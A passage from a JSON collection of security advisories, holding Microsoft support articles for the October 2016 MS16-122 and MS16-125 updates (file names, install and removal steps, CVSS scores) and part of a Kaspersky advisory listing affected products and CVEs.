target=\"_self\">3192391</a>\u00a0October 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-10\" target=\"_self\">3185330</a>\u00a0October 2016 security monthly quality rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-11\" target=\"_self\">3192440</a> Cumulative update for Windows 10: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-12\" target=\"_self\">3194798</a> Cumulative update for Windows 10 Version 1607 and Windows Server 2016: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-13\" target=\"_self\">3192441</a> Cumulative update for Windows 10 Version 1511: October 11, 2016</li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><a class=\"bookmark\" id=\"obtaintheupdate\"></a><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see<br/><a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-15\" target=\"_self\">Get security updates automatically</a>.<br/><br/><span class=\"text-base\">Note</span> For Windows RT 8.1, this update is available through Windows Update only.<br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=3195360\" id=\"kb-link-16\" target=\"_self\">Microsoft Update Catalog</a> website.</div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Method 3: Microsoft Download Center</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">You can obtain the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<br/><br/>Click the download link in <a href=\"https://technet.microsoft.com/library/security/ms16-122\" id=\"kb-link-17\" target=\"_self\">Microsoft Security Bulletin MS16-122</a> that corresponds to the version of Windows that you are running.<br/></div><br/></span></div></div></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information<br/></span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><br/><br/><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3190847-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3190847-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-18\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3190847\" id=\"kb-link-19\" target=\"_self\">Microsoft Knowledge Base Article 3190847</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x86.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7<br/><span class=\"text-base\">Windows6.1-KB3185330-x86.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3185330-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall </span>setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3192391</a><br/>See <a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 3185330</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 8.1 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3192392-x86.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3185331-x86.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3192392-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3185331-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192392\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 3192392</a><br/>See <a href=\"https://support.microsoft.com/help/3185331\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 3185331</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows RT 8.1 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">The 3192392 Security Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-26\" target=\"_self\">Windows Update</a> only. <br/>The 3185331 Monthly Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-27\" target=\"_self\">Windows Update</a> only. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192393\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 3192393</a><br/>See <a href=\"https://support.microsoft.com/help/3185332\" id=\"kb-link-29\" target=\"_self\">Microsoft Knowledge Base Article 3185332</a></td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 10 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-</span><span class=\"text-base\">KB3192440</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3192441-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-</span><span class=\"text-base\">KB3192441</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x64.ms</span><span class=\"text-base\">u</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-30\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-31\" target=\"_self\">Microsoft Knowledge Base Article 3192440</a><br/>See <a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-32\" target=\"_self\">Microsoft Knowledge Base Article 3192441</a><br/>See <a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-33\" target=\"_self\">Microsoft Knowledge Base Article 3194798</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-34\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-35\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-36\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-37\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 3, "modified": "2016-10-12T18:21:26", "id": "KB3195360", "href": "https://support.microsoft.com/en-us/help/3195360/", "published": "2016-10-11T00:00:00", "title": "MS16-122: Security update for Microsoft video control: October 11, 2016", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:37:11", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-7188 "], "description": "<html><body><p>Resolves a vulnerability in Windows that could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-125\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-125</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-3\" target=\"_self\">Add language packs to Windows</a>.<br/></li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-4\" target=\"_self\">3192440</a> <br/>Cumulative update for Windows 10: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-5\" target=\"_self\">3192441</a> <br/>Cumulative Update for Windows 10 Version 1511: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-6\" target=\"_self\">3194798</a> <br/>Cumulative update for Windows 10 Version 1607 and Windows Server 2016: October 11, 2016</li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><a class=\"bookmark\" id=\"obtaintheupdate\"></a><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see<br/><a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-8\" target=\"_self\">Get security updates automatically</a>. <br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=3193229\" id=\"kb-link-9\" target=\"_self\">Microsoft Update Catalog</a> website.<br/></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Method 3: Microsoft Download Center</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">You can obtain the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<br/><br/>Click the download link in <a href=\"https://technet.microsoft.com/library/security/ms16-125\" id=\"kb-link-10\" target=\"_self\">Microsoft Security Bulletin MS16-125</a> that corresponds to the version of Windows that you are running.<br/></div><br/></span></div></div></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information<br/></span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\"> Windows 10 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB</span><span class=\"text-base\">3192440</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3194798-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-</span><span class=\"text-base\">KB3194798</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-11\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span>\u00a0setup switch or click\u00a0<strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-12\" target=\"_self\">Microsoft Knowledge Base Article 3192440</a><span class=\"text-base\"><br/></span>See <a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-13\" target=\"_self\">Microsoft Knowledge Base Article 3192441</a><br/>See <a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-14\" target=\"_self\">Microsoft Knowledge Base Article 3194798</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 3, "modified": "2016-10-11T17:24:27", "id": "KB3193229", "href": "https://support.microsoft.com/en-us/help/3193229/", "published": "2016-10-11T00:00:00", "title": "MS16-125: Security update for diagnostics hub: October 11, 2016", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2020-09-02T11:46:24", "bulletinFamily": "info", "cvelist": ["CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-3393", "CVE-2016-3391", "CVE-2016-7182", "CVE-2016-0070", "CVE-2016-3298", "CVE-2016-3267", "CVE-2016-3376", "CVE-2016-0142", "CVE-2016-3382", "CVE-2016-3266", "CVE-2016-3270", "CVE-2016-7211", "CVE-2016-3385", "CVE-2016-7185", "CVE-2016-3262", "CVE-2016-3384"], "description": "### *Detect date*:\n10/11/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nMicrosoft Silverlight 5 when installed on Microsoft Windows (x64-based) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows Vista x64 Edition Service Pack 2 \nInternet Explorer 9 \nMicrosoft .NET Framework 4.6 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nSkype for Business 2016 (64-bit) \nMicrosoft .NET Framework 3.5 \nWindows Vista Service Pack 2 \nMicrosoft Lync 2013 Service Pack 1 (64-bit) \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nMicrosoft Lync Basic 2013 Service Pack 1 (64-bit) \nMicrosoft .NET Framework 3.5.1 \nMicrosoft Lync 2010 Attendee (admin level install) \nSkype for Business 2016 Basic (32-bit) \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nMicrosoft Silverlight 5 when installed on Apple Mac OS (Intel-based) \nWindows 10 Version 1703 for x64-based Systems \nSkype for Business 2016 (32-bit) \nMicrosoft Lync 2010 Attendee (user level install) \nMicrosoft .NET Framework 3.0 Service Pack 2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Lync 2010 (64-bit) \nMicrosoft Office Word Viewer \nMicrosoft Live Meeting 2007 Console \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (32-bit) \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (x64-based) \nMicrosoft Office 2007 Service Pack 3 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nMicrosoft .NET Framework 4.5.2 \nWindows 10 Version 1703 for 32-bit Systems \nSkype for Business 2016 Basic (64-bit) \nMicrosoft Lync Basic 2013 Service Pack 1 (32-bit) \nWindows 10 Version 1607 for 32-bit Systems \nMicrosoft Silverlight 5 Developer Runtime when installed on Apple Mac OS (Intel-based) \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nMicrosoft Lync 2010 (32-bit) \nMicrosoft Silverlight 5 when installed on Microsoft Windows (32-bit) \nWindows Server 2012 R2 \nMicrosoft Lync 2013 Service Pack 1 (32-bit)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-3396](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3396>) \n[CVE-2016-3393](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3393>) \n[CVE-2016-7211](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7211>) \n[CVE-2016-3209](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3209>) \n[CVE-2016-3298](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3298>) \n[CVE-2016-0070](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0070>) \n[CVE-2016-0142](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0142>) \n[CVE-2016-3382](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3382>) \n[CVE-2016-7185](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7185>) \n[CVE-2016-3270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3270>) \n[CVE-2016-3385](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3385>) \n[CVE-2016-3391](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3391>) \n[CVE-2016-3262](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3262>) \n[CVE-2016-3263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3263>) 